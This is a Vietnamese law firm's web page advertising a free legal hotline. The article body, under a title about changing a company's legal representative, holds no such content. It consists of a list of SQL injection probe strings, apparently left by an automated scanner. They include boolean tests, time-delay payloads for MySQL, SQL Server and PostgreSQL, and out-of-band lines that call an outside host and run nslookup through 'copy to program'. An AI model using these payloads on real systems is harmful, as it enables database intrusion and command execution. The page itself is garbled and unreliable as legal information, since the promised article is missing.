Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Thông báo thay đổi người đại diện theo pháp luật

Cập nhật lần cuối lúc 14:17 ngày 25/11/2013

Nguồn: vinalaf.com.vn
1
1
1'"
\
1
1
-1 OR 2+166-166-1=0+0+0+1 --
@@DutkO
-1 OR 3+166-166-1=0+0+0+1 --
JyI=
-1 OR 3*2<(0+5+166-166) --
-1 OR 3*2>(0+5+166-166) --
-1 OR 2+892-892-1=0+0+0+1
-1 OR 3+892-892-1=0+0+0+1
-1 OR 3*2<(0+5+892-892)
-1 OR 3*2>(0+5+892-892)
-1' OR 2+907-907-1=0+0+0+1 --
-1' OR 3+907-907-1=0+0+0+1 --
-1' OR 3*2<(0+5+907-907) --
-1' OR 3*2>(0+5+907-907) --
-1' OR 2+410-410-1=0+0+0+1 or 'rHr0u5qv'='
-1' OR 3+410-410-1=0+0+0+1 or 'rHr0u5qv'='
-1' OR 3*2<(0+5+410-410) or 'rHr0u5qv'='
-1' OR 3*2>(0+5+410-410) or 'rHr0u5qv'='
-1" OR 2+320-320-1=0+0+0+1 --
-1" OR 3+320-320-1=0+0+0+1 --
-1" OR 3*2<(0+5+320-320) --
-1" OR 3*2>(0+5+320-320) --
if(now()=sysdate(),sleep(17.061999999999997),0)/*'XOR(if(now()=sysdate(),sleep(17.061999999999997),0))OR'"XOR(if(now()=sysdate(),sleep(17.061999999999997),0))OR"*/
(select(0)from(select(sleep(17.061999999999997)))v)/*'+(select(0)from(select(sleep(17.061999999999997)))v)+'"+(select(0)from(select(sleep(17.061999999999997)))v)+"*/
-1; waitfor delay '0:0:25.592999999999996' --
-1); waitfor delay '0:0:25.592999999999996' --
1 waitfor delay '0:0:8.530999999999998' --
JCXR2D9O'; waitfor delay '0:0:8.530999999999998' --
-1;select pg_sleep(17.061999999999997); --
-1);select pg_sleep(25.592999999999996); --
-1));select pg_sleep(8.530999999999998); --
1iwkfPX5';select pg_sleep(8.530999999999998); --
DibSdHlI';select pg_sleep(17.061999999999997); --
iBXMpbrn');select pg_sleep(17.061999999999997); --
cBHtywSp'));select pg_sleep(25.592999999999996); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6689.34060.f1de8.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6690.34060.f1de8.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6692.34060.f1de8.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6694.34060.f1de8.\1.bxss.me
641'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: